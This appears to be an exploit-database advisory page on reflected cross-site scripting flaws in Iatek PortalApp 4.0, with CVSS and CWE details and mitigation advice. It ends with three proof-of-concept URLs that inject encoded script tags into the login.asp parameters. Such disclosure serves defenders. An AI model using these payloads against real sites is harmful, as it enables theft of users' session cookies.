header-logo
Suggest Exploit
vendor:
PortalApp
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: PortalApp
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerabilities in Iatek PortalApp

Iatek PortalApp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

The vendor should ensure that user-supplied input is properly sanitized to prevent cross-site scripting vulnerabilities. Users are advised to avoid visiting untrusted websites or clicking on suspicious links to minimize the risk of exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41224/info

Iatek PortalApp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Iatek PortalApp 4.0 is vulnerable; prior versions may also be affected. 

http://www.example.com/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=

http://www.example.com/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=

http://www.example.com/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1